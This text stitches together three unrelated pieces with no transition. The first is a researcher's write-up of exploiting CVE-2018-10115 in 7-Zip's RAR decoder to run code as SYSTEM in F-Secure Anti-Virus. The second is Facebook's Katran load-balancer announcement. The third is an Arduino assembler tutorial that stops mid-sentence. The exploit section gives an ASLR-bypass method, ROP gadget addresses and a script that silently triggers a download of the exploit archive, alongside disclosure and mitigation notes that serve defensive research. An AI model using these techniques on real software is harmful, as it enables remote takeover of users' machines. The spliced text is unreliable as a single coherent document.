In my previous 7-Zip exploit, I demonstrated how we can use 7-Zip’s methods for RAR header processing to massage the heap. This was not completely trivial, but after that, we were basically done. Since 7-Zip 18.01 came without ASLR, a completely static ROP chain was enough to obtain code execution.

With F-Secure deploying ASLR, such a static ROP chain cannot work anymore, and an additional idea is required. In particular, we need to compute the ROP chain dynamically. In a scriptable environment, this is usually quite easy: Simply leak a pointer to derive the base address of some module, and then just add this base address to the prepared ROP chain.

Since the bug we try to exploit resides within RAR extraction code, a promising idea could be to use the RarVM as a scripting environment to compute the ROP chain. I am quite confident that this would work, if only the RarVM were actually available. Unfortunately, it is not: Even though 7-Zip's RAR implementation supports the RarVM, it is disabled by default at compile time, and F-Secure did not enable it either.

While it is almost certain the F-Secure engine contains some attacker-controllable scripting engine (outside of the 7-Zip module), it seemed difficult to exploit something like this in a reliable manner. Moreover, my goal was to find an ASLR bypass that works independently of any F-Secure features. Ideally, the new exploit would also work for 7-Zip (with ASLR), as well as any other software that makes use of 7-Zip as a library.

In the following, I will briefly recap the most important aspects of the exploited bug. Then, we will see how to bypass ASLR in order to achieve code execution.

The Bug

The bug I am exploiting is explained in detail in my previous blog post. In essence, it is an uninitialized memory usage that allows us to control a large part of a RAR decoder’s state. In particular, we are going to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::LongLZ1 contains the following code:

if (AvrPlcB > 0x28ff) { distancePlace = DecodeNum(PosHf2); }
else if (AvrPlcB > 0x6ff) { distancePlace = DecodeNum(PosHf1); }
else { distancePlace = DecodeNum(PosHf0); }
// some code omitted
for (;;) {
  dist = ChSetB[distancePlace & 0xff];
  newDistancePlace = NToPlB[dist++ & 0xff]++;
  if (!(dist & 0xff)) { CorrHuff(ChSetB,NToPlB); }
  else { break; }
}

ChSetB[distancePlace] = ChSetB[newDistancePlace];
ChSetB[newDistancePlace] = dist;

This is very useful, because the uint32_t arrays ChSetB and NtoPlB are fully attacker controlled (since they are not initialized if we trigger this bug). Hence, newDistancePlace is an attacker-controlled uint32_t, and so is dist (with the restriction that the least significant byte cannot be 0xff). Moreover, distancePlace is determined by the input stream, so it is attacker-controlled as well.

So this gives us a pretty good read-write primitive. Note, however, that it has a few restrictions. In particular, the executed operation is basically a swap. We can use the primitive to do the following:

  • We can read arbitrary uint32_t values from 4-byte aligned 32-bit offsets starting from &ChSetB[0] into the ChSetB array. If we do this, we always overwrite the value we just read (since it is a swap).
  • We can write uint32_t values from the ChSetB array to arbitrary 4-byte aligned 32-bit offsets starting from &ChSetB[0]. Those values can be either constants, or values that we have read before into the ChSetB array. In any case, the least significant byte must not be 0xff. Furthermore, since we are swapping values, a written value is always destroyed (within the ChSetB array) and cannot be written a second time.

Lastly, note that the way the index newDistancePlace is determined restricts us further. First, we cannot do too many of such read/write operations, since the array NToPlB has only 256 elements. Second, if we are writing a value that is unknown in advance (say, a part of an address subject to ASLR), we might not know exactly what dist & 0xff is, so we need to fill (possibly many) different entries in the NToPlB with the desired index.

It is clear that this basic read-write primitive for itself is not enough to bypass ASLR. An additional idea is required.

Exploitation Strategy

We make use of roughly the same exploitation strategy as in the 7-Zip exploit:

  1. Place a Rar3 decoder object in constant distance after the Rar1 decoder containing the read-write primitive.
  2. Use the Rar3 decoder to extract the payload into the _window buffer.
  3. Use the read-write primitive to swap the Rar3 decoder’s vtable pointer with the _window pointer.

Recall that in the 7-Zip exploit, the payload we extracted in step 2 contained a stack pivot, the (static) ROP chain, and the shellcode. Obviously, such a static ROP chain cannot work in an environment with full ASLR. So how do we dynamically extract a valid ROP chain into the buffer without knowing any address in advance?

Bypassing ASLR

We are in a non-scriptable environment, but we still want to correct our ROP chain by a randomized offset. Specifically, we would like to add 64-bit integers.

Well, we might not need a full 64-bit addition. The ability to adjust an address by overwriting the least significant bytes of it could suffice. Note, however, that this does not work in general. Consider &f being a randomized address to some function. If the address was a completely uniform random 64-bit value, and we would just overwrite the least significant byte, then we would not know by how much we changed the address. However, the idea works if we know nothing about the address, except for the d least significant bytes. In this case, we can safely overwrite the d least significant bytes, and we will always know by how much we changed the address. Luckily, Windows loads every module at a (randomized) 64K aligned address. This means that the two least significant bytes of any code address will be constant.
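To make the partial-overwrite idea concrete, here is a small, stand-alone illustration (not exploit code; the module base is a made-up 64K-aligned value, and a little-endian byte order is assumed):

/* Illustration of a 2-byte partial pointer overwrite (little-endian assumed). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    uint64_t module_base = 0x00007ff6a3b20000ULL; /* hypothetical, 64K aligned */
    uint64_t f = module_base + 0x1234;            /* low 16 bits are always 0x1234 */
    uint16_t new_low = 0x5678;                    /* the two bytes we choose to write */

    memcpy(&f, &new_low, sizeof(new_low));        /* overwrite only the 2 LSBs */

    /* regardless of where the module was loaded, f is now module_base + 0x5678 */
    printf("offset within module: 0x%04llx\n",
        (unsigned long long)(f - module_base));
    return 0;
}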

Why is this idea useful in our case? As you might know, RAR is strongly based on Lempel–Ziv compression algorithms. In these algorithms, the coder builds a dynamic dictionary, which contains sequences of bytes that occurred earlier in the compressed stream. If a byte sequence is repeating itself, then it can be encoded efficiently as a reference to the corresponding entry in the dictionary.

In RAR, the concept of a dynamic dictionary occurs in a generalized form. In fact, on an abstract level, the decoder executes in every step one of the following two operations:

  1. PutByte(bytevalue), or
  2. CopyBlock(distance,num)

The operation CopyBlock copies num bytes, starting from distance bytes before the current position of the window buffer. This gives rise to the following idea:

  1. Use the read-write primitive to write a function pointer to the end of our Rar3 window buffer. This function pointer is the 8-byte address &7z.dll+c for some (known) constant c.
  2. The base address &7z.dll is strongly randomized, but it is always 64K aligned. Hence, we can make use of the idea explained at the beginning of this section: First, we write two arbitrary bytes of our choice (using two invocations of PutByte(b)). Then, we copy (by using a CopyBlock(d,n) operation) the six most significant bytes of the function pointer &7z.dll+c from the end of the window buffer. Together, they form eight bytes, a valid address, pointing to executable code.

Note that we are copying from the end of the window buffer. It turns out that this works in general, because the source index (currentpos - 1) - distance is computed modulo the size of the window. However, the 7-Zip implementation actually checks whether we copy from a distance greater than the current position and aborts if this is the case. Fortunately, it is possible to bypass this check by corrupting a member variable of the Rar3 decoder with the read-write primitive. I leave it as an (easy) exercise for the interested reader to figure out which variable this is and why this works.

ROP

The technique outlined in the previous section allows us to write a ROP chain that consists of addresses within a single 64K region of code. Does this suffice? Let’s see. We try to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;

The crucial step of the chain is to call VirtualAlloc. All occurrences of jmp cs:VirtualAlloc I could find within F-Secure's 7z.dll were at offsets of the form +0xd****. Unfortunately, I could not find an easy way to retrieve a pointer of this form within (or near) the Rar decoder objects. Instead, I could find a pointer of the form +0xc****, and used the following technique to turn it into a pointer of the form +0xd****:

  1. Use the read-write primitive to swap the largest available pointer of the form +0xc**** into the member variable LCount of the Rar1 decoder.
  2. Let the Rar1 decoder process a carefully crafted item, such that the member variable LCount is incremented (with a stepsize of one) until it has the form +0xd****.
  3. Use the read-write primitive to swap the member variable LCount into the end of the Rar3 decoder’s window buffer (see previous section).

As it turns out, the largest available pointer of the form +0xc**** is roughly +0xcd000, so we only need to increase it by 0x3000.

Being able to address a full 64K code region containing a jump to VirtualAlloc, I hoped that a ROP chain of the above form would be easy to achieve. Unfortunately, I simply could not do it, so I copied a second pointer to the window buffer. Two regions of 64K code, so 128K in total, were enough to obtain the desired ROP chain. It is still far from being nice, though. For example, this is what the stack pivot looks like:

0xd335c # push rax; cmp eax, 0x8b480002; or byte ptr [r8 - 0x77], cl; cmp bh, bh; adc byte ptr [r8 - 0x75], cl; pop rsp; and al, 0x48; mov rbp, qword ptr [rsp + 0x50]; mov rsi, qword ptr [rsp + 0x58]; add rsp, 0x30; pop rdi; ret;

Another example is how we set the register R9 to PAGE_EXECUTE_READWRITE (0x40) before calling VirtualAlloc:

# r9 := r9 >> 9
0xd6e75, # pop rcx; sbb al, 0x5f; ret;
0x9, # value popped into rcx
0xcdb4d, # shr r9d, cl; mov ecx, r10d; shl edi, cl; lea eax, dword ptr [rdi - 1]; mov rdi, qword ptr [rsp + 0x18]; and eax, r9d; or eax, esi; mov rsi, qword ptr [rsp + 0x10]; ret; 

This works, because R9 always has the value 0x8000 when we enter the ROP chain.

Wrapping up

We have seen a sketch of the basic exploitation idea. When actually implementing it, one has to overcome quite a few additional obstacles I have ignored to avoid boring you too much. Roughly speaking, the basic implementation steps are as follows:

  1. Use (roughly) the same heap massaging technique as in the 7-Zip exploit.
  2. Implement a basic Rar1 encoder to create a Rar1 item that controls the read-write primitive in the desired way.
  3. Implement a basic Rar3 encoder to create a Rar3 item that writes the ROP chain as well as the shellcode into the window buffer.

Finally, all items (even of different Rar versions) can be merged into a single archive, which leads to code execution when it is extracted.

Minimizing Required User Interaction

Virtually all antivirus products come with a so-called file system minifilter, which intercepts every file system access and triggers the engine to run background scans. F-Secure’s products do this as well. However, such automatic background scans do not extract compressed files. This means that it is not enough to send a victim a malicious RAR archive via e-mail. If one did this, it would be necessary for the victim to trigger a scan manually.

Obviously, this is still extremely bad, since the very purpose of antivirus software is to scan untrusted files. Yet, we can do better. It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files received over HTTP if they are at most 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. In order to do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request as follows:

<script>
  var xhr = new XMLHttpRequest(); 
  xhr.open('GET', '/exploit.rar', true); 
  xhr.responseType = 'blob';
  xhr.send(null);
</script>

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 64-bit (Build 17134.81) with F-Secure Anti-Virus (also fully updated, but 7z.dll has been replaced with the unpatched version, which I have extracted from an F-Secure installation on April 15, 2018).

As you can see, the engine (fshoster64.exe) runs as NT AUTHORITY\SYSTEM, and the exploit causes it to start notepad.exe (also as NT AUTHORITY\SYSTEM).

Maybe you are asking yourself now why the shellcode starts notepad.exe instead of the good old calc.exe. Well, I tried to open calc.exe as NT AUTHORITY\SYSTEM, but it did not work. This has nothing to do with the exploit or the shellcode itself. It seems that it just does not work anymore with the new UWP calculator (it also fails to start when using psexec64.exe -i -s).

Conclusion

We have seen how an uninitialized memory usage bug can be exploited for arbitrary remote code execution as NT AUTHORITY\SYSTEM with minimal user interaction.

Apart from discussing the bugs and possible solutions with F-Secure, I have proposed three mitigation measures to harden their products:

  1. Sandbox the engine and make sure most of the code does not run under such high privileges.
  2. Stop snooping into HTTP traffic. This feature is useless anyway. It literally does not provide any security benefit whatsoever, since evading it requires the attacker only to switch from HTTP to HTTPS (F-Secure does not snoop into HTTPS traffic – thank God!). Hence, this feature only increases the attack surface of their products.
  3. Enable modern Windows exploitation mitigations such as CFG and ACG.

Finally, I want to remark that the presented exploitation technique is independent of any F-Secure features. It works on any product that uses the 7-Zip library to extract compressed RAR files, even if ASLR and DEP are enabled. For example, it is likely that Malwarebytes was affected as well.

 

Timeline of Disclosure

  • 2018-03-06 — Discovery of the bug in 7-Zip and F-Secure products (no reliably crashing PoC for F-Secure yet).
  • 2018-03-06 — Report to 7-Zip developer Igor Pavlov.
  • 2018-03-11 — Report to F-Secure (with reliably crashing PoC).
  • 2018-04-14 — MITRE assigned CVE-2018-10115 to the bug (for 7-Zip).
  • 2018-04-15 — Additional report to F-Secure that this was a highly critical vulnerability, and that I had a working code execution exploit for 7-Zip (only an ASLR bypass missing to attack F-Secure products). Proposed a detailed patch to F-Secure, and strongly recommended to roll out a fix without waiting for the upcoming 7-Zip update.
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115.
  • 2018-05-22 — F-Secure fix release via automatic update channel.
  • 2018-05-23 — Additional report to F-Secure with a full PoC for Remote Code Execution on various F-Secure products.
  • 2018-06-01 — Release of F-Secure advisory.
  • 2018-??-?? — Bug bounty paid.

Open-sourcing Katran, a scalable network load balancer (Facebook libs)

With billions of people around the globe using Facebook services, our infrastructure engineers have created a range of systems to optimize traffic and to enable fast, reliable access for everyone. Today, we are open-sourcing a component of this work by releasing the Katran forwarding plane software library, which powers the network load balancer used in Facebook’s infrastructure. Katran offers a software-based solution to load balancing with a completely reengineered forwarding plane that takes advantage of two recent innovations in kernel engineering: eXpress Data Path (XDP) and the eBPF virtual machine. Katran is deployed today on backend servers in Facebook’s points of presence (PoPs), and it has helped us improve the performance and scalability of network load balancing and reduce inefficiencies such as busy loops when there are no incoming packets. By sharing it with the open source community, we hope others can improve the performance of their load balancers and also use Katran as a foundation for future work.

The challenge of serving requests at Facebook scale

To manage traffic at Facebook scale, we have deployed a globally distributed network of points of presence to act as proxies for our data centers. Given the extremely high volume of requests, both PoPs and data centers confront the challenge of making the large fleet of (backend) servers appear as a single virtual unit to the outside world and also distributing the workload efficiently among those backend servers.

These challenges are typically addressed by announcing a virtual IP address (VIP) to the internet at each location. Packets destined to the VIP are then seamlessly distributed among the backend servers. The distribution algorithm, however, needs to account for the fact that the backend servers typically operate at an application layer and terminate the TCP connections. This responsibility is handled by a network load balancer (often called a layer 4 load balancer, or an L4LB, because it operates on packets rather than serving application level requests). Figure 1 illustrates the role of an L4LB in relation to the other network components.

Figure 1: A network load balancer fronts several backend servers running a backend application and consistently sends all packets from each client connection to a unique backend server.

Requirements for a high-performance load balancer

An L4LB’s performance is especially important for managing latency and scaling the number of backend servers, because the L4LBs are on a path that needs to process every incoming packet. Performance is typically measured as peak packets per second (pps) that the L4LB can process. Traditionally, engineers have preferred hardware-based solutions for this task because they typically use accelerators such as application-specific integrated circuits (ASICs) or field-programmable gate arrays (FPGAs) to reduce the burden on the main CPU. However, one of the drawbacks of a hardware-centric approach is that it limits the system’s flexibility. To effectively serve Facebook’s needs, a network load balancer must:

  • Run on commodity Linux servers. This allows us to run the load balancer on part or all of the large fleet of currently deployed servers. A software-based load balancer satisfies this criteria.
  • Coexist with other services on a given server. This removes the need for dedicated servers that run the load balancer exclusively, thereby increasing fault tolerance.
  • Allow low-disruption maintenance. Facebook’s software must be able to evolve quickly in order to support new or improved products and services. Maintenance and upgrades are a norm, not exceptions, for the load balancer and backend layers. Minimizing disruption during these events allows us to iterate faster.
  • Offer easy instrumentation and debugging. All large distributed infrastructures must contend with anomalies and unexpected events, so reducing the time to debug and troubleshoot issues is important. The load balancer needs to be instrumentable and friendly to standard tools like tcpdump.

In order to solve for these requirements, we designed a high-performance software network load balancer. The first generation of our L4LB was based on the IPVS kernel module and served Facebook’s needs for well over four years. However, it fell short on the goal of coexistence with other services, specifically the backends. In the second iteration, we leveraged the eXpress Data Path (XDP) framework and the new BPF virtual machine (eBPF) to run the software load balancer together with the backends on a large number of machines. Figure 2 shows the key difference between the two generations.

Figure 2: Differences between the two generations of L4LBs. Note that both are software load balancers running on backend servers. Katran (right) allows us to colocate the load balancer with backend application, thus increasing the load balancer capacity.

Our First-generation L4LB: Building on OSS Software

With our first-generation L4LB, we leaned heavily on existing open source components to implement most of the functionality. This approach helped us replace a hardware-based solution across a large deployment in only a few months. The design has four major components:

  • VIP announcement: This component simply announces the virtual IP addresses that the L4LB is responsible for to the world by peering with the network element (typically a switch) in front of the L4LB. The switch then uses an equal-cost multipath (ECMP) mechanism to distribute packets among the L4LBs announcing the VIP. We used ExaBGP for the VIP announcement because of its lightweight, flexible design.
  • Backend server selection: In order to send all packets from a client to the same backend, the L4LBs use a consistent hash that depends on the 5-tuple (source address, source port, destination address, destination port, and protocol) of the incoming packet. The use of a consistent hash ensures that all packets that belong to a transport connection are sent to the same backend irrespective of the L4LB receiving the packet. This removes the need for any state synchronization across multiple L4LBs. The consistent hash also guarantees minimal disruption to existing connections when a backend leaves or joins the pool of backends.
  • Forwarding plane: Once the L4LB picks the appropriate backend, the packets need to be forwarded to that host. To avoid restrictions such as keeping L4LB and backend hosts on the same L2 domain, we use a simple IP-in-IP encapsulation. This allows us to place L4LB and backend hosts in different racks. We used the IPVS kernel module for the encapsulation. The backends are configured to have the corresponding VIP on their loopback interface. This allows the backend to send packets on the return path directly to the client (instead of the L4LB). This optimization, often called direct server return (DSR), allows the L4LB to be constrained only by the incoming packet volume.
  • Control plane: This component performs various functions, including performing health checks on the backend servers, providing a simple interface (via a configuration file) to add or remove VIPs, and providing simple APIs to examine the state of the L4LB and backend servers. We developed this component in-house.

Each L4LB also stores the backend choice for each 5-tuple as a lookup table to avoid duplicate computation of the hash on future packets. This state is a pure optimization and is not necessary for correctness. This design met several requirements of Facebook's workload listed above, but there was one major drawback: Colocating the L4LB and a backend on a single host increased the chance of device failure. Even with the local state, the L4LB was a CPU-intensive component. To separate the failure domains, we ran the L4LBs and backend servers on a disjoint set of machines. There were fewer L4LBs than backend servers in this setup, which made the L4LBs more vulnerable to a sudden increase in load. The fact that packets had to traverse the regular Linux network stack before being handled by the L4LB exacerbated the problem.

Figure 3: Overview of our first-generation L4LB. Note that the load balancer and the backend application run on different machines. Different load balancers make consistent decisions without any state synchronization. Using packet encapsulation allows the servers running the load balancer and the backend application to be placed in different racks. In a typical deployment, the ratio of the number of L4LBs to the number of backend application servers is very small.

Katran: Reimagining the forwarding plane

Katran, our second-generation L4LB, significantly improves upon the previous version with a completely reengineered forwarding plane. Two recent developments in the kernel world powered the new design:

  • The XDP provides a fast, programmable network data path without resorting to a full-fledged kernel bypass method and works in conjunction with the Linux networking stack. (A detailed overview of XDP is available here.)
  • The eBPF virtual machine provides a flexible, efficient, and more reliable way to interact with the Linux kernel and to extend its functionality by running user-space supplied programs at specific points in the kernel. eBPF has already brought dramatic improvements to several areas, including tracing and filtering. (More details are available here.)

The overall architecture of the system is similar to that of the first-generation L4LB: First, ExaBGP announces to the world which VIPs a particular Katran instance is responsible for. Second, packets destined to a VIP are sent to Katran instances using an ECMP mechanism. Finally, Katran selects a backend and forwards the packet to the correct backend server. The main differences are in the last step.

Early and efficient packet handling: Katran uses XDP in combination with a BPF program for packet forwarding. When XDP is enabled in driver mode, a packet handling routine (BPF program) is run immediately after a packet is received by the network interface card (NIC) and before the kernel intercepts it. XDP invokes the BPF program on every incoming packet. If the NIC has multiple queues, the program is invoked in parallel for each one of them. The BPF program used for handling packets is lockless and uses a per-CPU version of BPF maps. Due to this parallelism, performance scales linearly with the number of the NIC's RX queues. Katran also supports the "generic XDP" mode (instead of driver mode) of operation, at a performance cost.
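For readers who have not seen XDP before, the following is a minimal BPF program (not Katran's code) that simply passes every packet on to the normal kernel stack; Katran's forwarding program hooks in at exactly this point, but makes encapsulation and backend decisions instead of always returning XDP_PASS:

/* Minimal XDP sketch (not Katran code); compile with: clang -O2 -target bpf -c xdp_pass.c */
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("xdp")
int xdp_pass_all(struct xdp_md *ctx)
{
	/* Other possible verdicts: XDP_DROP, XDP_TX, XDP_ABORTED, XDP_REDIRECT. */
	return XDP_PASS;
}

char _license[] SEC("license") = "GPL";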

Inexpensive and more stable hashing: Katran uses an extended version of the Maglev hash to select the backend server. A few features of the extended hash are resilience to backend server failures, more uniform distribution of load, and the ability to set unequal weights for different backend servers. The last of these is an important feature that allows us to handle hardware refreshes in our PoPs and data centers easily: We can absorb the newer generation hardware by simply setting appropriate weights. Despite its being more expressive, the code for computing this hash is small enough to fit entirely in the L1 cache.

More resilient local state: Katran’s efficiency at handling packets and computing the hash results in an interesting interaction with the local state table. We observed that, quite often, computing the hash is computationally easier than looking up the local state table for the 5-tuple to backend server choice. This is more visible for cases where the local state table lookup traverses all the way to the shared last level cache. In order to take advantage of this phenomenon in a natural way, we implemented the lookup table as an LRU-evicting cache. The LRU cache size is configurable at startup time and acts as a tunable parameter to strike a balance between computation and lookup. We picked these values empirically to optimize for pps. In addition, Katran provides a runtime “compute only” switch to ignore the LRU cache altogether in the event of catastrophic memory pressure on the host.

RSS-friendly encapsulation: Receive Side Scaling (RSS) is an important optimization in NICs that aims to spread load across CPUs uniformly by steering packets from each flow to a separate CPU. Katran crafts its encapsulation to work in conjunction with RSS. Instead of using the same outer source for every IP-in-IP packet, packets in different flows (e.g., with different 5-tuples) are encapsulated using a different outer source IP, but packets in the same flow are always assigned the same outer source IP.

Figure 4: Katran enables a fast path for processing packets at high speed without resorting to a full-fledged kernel bypass. Note that the packets cross the kernel/user-space boundary only once. This allows us to colocate the L4LB and backend application without sacrificing performance.

These features dramatically enhance performance, flexibility and scalability of the L4LB. Katran's design also gets rid of busy loops on the receive path, so it consumes barely any CPU if there are no incoming packets. In contrast to a full-fledged Kernel Bypass solution (such as DPDK), using XDP allows us to run Katran alongside any application without any performance penalties on the same host. Katran today runs alongside the backend servers in our PoPs with an improved L4LB-to-backend ratio. This increases resilience to load spikes, host failures, and maintenance, as well. The reengineered forwarding plane was central to this shift. We believe other systems can benefit by using our forwarding plane, so we are open-sourcing our code and including several examples of how to use it to craft an L4LB.

Additional Considerations

Katran operates under certain assumptions and constraints that enable the performance improvements. In practice, we found these constraints to be fairly reasonable, and they did not block our deployment. We believe that most users of our library will find them easy to satisfy. We’ve listed them below:

  • Katran works only in direct service return (DSR) mode.
  • Katran is the component that decides the final destination of a packet addressed to a VIP, so the network needs to route packets to Katran first. This requires the network topology to be L3 based, i.e., packets are routed by IP rather than by MAC addresses.
  • Katran cannot forward fragmented packets, nor can it fragment them itself. This can be mitigated either by increasing the maximum transmission unit (MTU) inside the network or by changing the advertised TCP MSS from the backends. (The latter step is recommended even if you have increased the MTU.)
  • Katran doesn’t support packets with IP options set. The maximum packet size cannot exceed 3.5 KB.
  • Katran was built with the assumption that it is going to be used in a “load balancer on a stick” scenario, where a single interface is used both for traffic “from user to L4LB (ingress)” and “from L4LB to L7LB (egress)”.

Despite these limitations, we believe that Katran offers an excellent forwarding plane to users and organizations who intend to leverage the exciting combination of XDP and eBPF to build efficient load balancers. We look forward to answering any questions from prospective adopters on our GitHub repository — and pull requests are always welcome!

How to program an Arduino in assembler

Reading a DHT-11 temperature sensor on bare-metal Arduino Uno (ATmega328p) hardware using nothing but assembler

Let's use a simple example to see how you can “hack” an Arduino Uno and start writing programs in machine code, i.e. in assembler, for the ATmega328p microcontroller. Most of the inexpensive “classic” duino boards are built around this very chip. The code will also run on practically any demo board based on the ATmega328p and, with minor tweaks, on any Arduino board built around an Atmel AVR microcontroller. In this example I have tried to get as close to the hardware as possible. For a better understanding of how the microcontroller works we will not use any ready-made libraries, let alone the Arduino IDE. As a training exercise we will do the simplest useful thing possible: correctly and usefully toggle one pin of the microcontroller, that is, read data from a DHT-11 temperature and humidity sensor.

Arduino is a really neat thing, but a lot of what happens to the microcontroller is deliberately hidden in the depths of the libraries and the Arduino environment so as not to scare off beginners. After playing with the blinking LED I wanted to understand how the microcontroller actually works. Apart from satisfying pure curiosity, knowing how the microcontroller and its standard means of talking to the outside world (the peripherals) work is an advantage when writing code for Arduino as well as C/assembler code for microcontrollers in general, and it helps you write more efficient programs. So, we will do everything as close to the hardware as possible. We have: an Arduino Uno-compatible board, a DHT-11 sensor, three wires, Atmel Studio, and machine code.

First, let's prepare the necessary equipment.

We will write the code in Atmel Studio 7, a free download from the site of the microcontroller's manufacturer, Atmel.

Atmel Studio 7

All the code was run on an Arduino Uno clone, in my case a DFRduino Uno from DFRobot, with an ATmega328p running at 16 MHz: an excellent, reliable board. I have not noticed any differences from a standard Uno in everyday use. A similar black board from DFRobot, only a “Mega”, spent two years as the flight controller of my quadcopter; it has been through a lot and never gave me any trouble.

DFRduino Uno

To look at signals lasting microseconds (that is, millionths of a second) I used a device called a logic analyzer, specifically a clone of the eight-channel USBEE AX Pro. How you would debug such fast processes without an oscilloscope or a logic analyzer, I honestly do not know and cannot advise.

First of all I connected my Uno clone (as I said, a DFRduino Uno) to Atmel Studio 7 and tried blinking an LED in assembler. How to connect the board is described in many places; one example is linked at the end. The code is written right in the Studio, and the board can be flashed over the USB port using the familiar Arduino bootloader, via AVRDude. You can also flash it with an external programmer (I tried a Chinese USBASP), and in fact both methods worked for me. In either case you only need to configure AVRDude correctly; an example of my settings is shown in the picture.

The full argument string:
-C "C:\avrdude\avrdude.conf" -p atmega328p -c arduino -P COM7 -b 115200 -U flash:w:"$(ProjectDir)Debug\$(TargetName).hex":i

In the end, for simplicity, I settled on flashing over the USB port, the standard way for Arduino. My UNO has an ATmega328P chip, and that is what you need to specify when creating the project. You also need to select the port the Arduino is connected to; on my computer it was COM7.

To simply blink an LED no extra wiring is needed: we will use the LED that is already on the board and wired to Arduino pin D13, which, remember, is pin 5 of the controller's PORTB.

We connect the board to the computer with a USB cable, write the code in the Studio, and flash it straight from the Studio. The main problem here is actually seeing the blinking: the controller runs at 16 MHz, and if we switch the LED on and off at that rate all we will see is a dimly glowing LED and nothing more.

To be able to see when it is lit and when it is off, we will turn the LED on and then keep the CPU busy with useless work for about one second. The delay itself can be calculated by hand, knowing the clock frequency (one instruction takes one cycle), or with a dedicated calculator (link at the bottom). With the delay in place, code that does roughly what the classic Arduino “Blink” does might look like this:

      			cli
			sbi DDRB, 5	; PORT B, pin 5 - output
			sbi PORTB, 5	; set pin 5 to logic one

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			nop
			
			in R16, PORTB	; XOR-toggle bit 5 of the port
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			
			rjmp loop
Once again: on my board the Arduino LED (D13) sits on pin 5 of the ATmega's PORTB.
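
As a sanity check of those register values, here is a small host-side sketch (Python, run on the PC, not on the AVR) that simulates the cascaded delay loop above and counts cycles, assuming 1 cycle for ldi/dec/nop and 2 cycles for a taken brne (1 when not taken), per the AVR instruction set manual:

F_CPU = 16_000_000                 # 16 MHz

def delay_cycles(r18, r19, r20):
    cycles = 3                     # the three ldi instructions, 1 cycle each
    while True:
        r20 = (r20 - 1) & 0xFF     # dec r20
        cycles += 1
        if r20:                    # brne L1 (taken)
            cycles += 2
            continue
        cycles += 1                # brne not taken
        r19 = (r19 - 1) & 0xFF     # dec r19
        cycles += 1
        if r19:                    # brne L1 (taken)
            cycles += 2
            continue
        cycles += 1
        r18 = (r18 - 1) & 0xFF     # dec r18
        cycles += 1
        if r18:                    # brne L1 (taken)
            cycles += 2
            continue
        cycles += 1
        return cycles + 1          # trailing nop

c = delay_cycles(82, 43, 0)        # the simulation takes a few seconds in Python
print(c, "cycles =", c / F_CPU, "seconds")

The counted total comes out to almost exactly sixteen million cycles, i.e. about one second per pass at 16 MHz, which matches what the delay calculator produces.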

Strictly speaking, writing it like this is not great, because we have completely trampled over such important things as the stack and the interrupt vector table (more on those later).

OK, we have blinked the LED; now, to make the GPIO practice somewhat meaningful, let's read values from a DHT11 sensor, and do that entirely in assembler as well.

To read data from the sensor you have to put high and low levels on the sensor's data line in the right sequence; this is exactly what “toggling a microcontroller pin” means. On the one hand there is nothing complicated about it; on the other hand it is a meaningful activity: we measure temperature and humidity, so you could say we have made a first step towards building some kind of weather station in the future.

Looking one step ahead: what are we actually going to do with the data we read? Fine, we read the sensor and set a variable in the controller's memory to, say, 23 degrees Celsius. How do we look at that number? There is a solution! I will view the readings on the big computer by sending them through the controller's USART, over the USB cable, into a virtual COM port and straight into a terminal program such as PuTTY. For the computer to be able to read our data we will use a USB-TTL converter, the gadget that provides the virtual COM port in Windows.

The wiring diagram may look roughly like this:

The sensor's signal pin is connected to pin 2 (PIN2) of the controller's PORTD, or, which is the same thing, to Arduino pin D2. The same line is pulled up to the supply “plus” through a 4.7 kOhm resistor. The sensor's plus and minus are connected to the corresponding power wires. The USB-TTL adapter is connected to the Tx output of the Arduino's USART, which means PIN1 of the controller's PORTD.

Assembled on a breadboard:

Now let's figure out the sensor and look at the datasheet. The sensor itself is simple and uses just one signal wire, which has to be pulled up to +5V through a resistor; that is the idle “high” level on the line. When the line is free, i.e. neither the controller nor the sensor is transmitting, it sits at that base “high” level. When the sensor or the controller transmits, it takes over the line and drives it “low” for some amount of time. The sensor sends 5 bytes in total, one after another: first the humidity readings, then the temperature, finishing with a checksum, so it looks like “HHTTXX”; in short, see the datasheet. Five bytes are 40 bits, and each bit is encoded in a special way during transmission.

For simplicity, we will consider a “high” level on the line to be a “one” and a “low” level a “zero”. According to the datasheet, to start a conversation with the sensor the controller has to pull the signal line to ground, i.e. put a “zero” on the line, hold it for no less than 20 ms (milliseconds), and then abruptly release the line. In response the sensor must put its own message on the signal line, made of high and low pulses of various lengths that encode the 40 bits we want. And, per the datasheet, if we manage to read that message with the controller, we immediately know that: a) the sensor actually answered, b) it sent the humidity and temperature data, and c) it sent the checksum. At the end of the transmission the sensor releases the line. The datasheet also says the sensor should not be polled more often than once per second.

So, according to the datasheet, for the sensor to answer, the microcontroller has to hold the line low for 20 milliseconds, release it, and quickly watch what happens on the line:

The sensor must answer by pulling the line low for 80 microseconds (µs) and then releasing it for another 80 µs; this can be taken as confirmation that a live sensor is on the line and responding:

Right after that, on the falling edge from high to low, the sensor starts transmitting 40 individual bits. Each bit is encoded by a special pulse pair consisting of two intervals. First the sensor takes the line (pulls it low) for a certain time, a first “half-bit” of sorts. Then the sensor releases the line (it is pulled up to one), also for a certain time, a second “half-bit”. The durations of these “half-bit” intervals, in microseconds, encode what the sensor is actually trying to send: a “zero” bit or a “one” bit.

Let's look at the description of a bit frame: the first “half-bit” is always low and of fixed duration, about 50 µs. The duration of the second “half-bit” determines what the sensor is sending.

To transmit a zero, a high pulse of 26–28 µs is used:

To transmit a one, the high pulse is stretched to 70 microseconds:

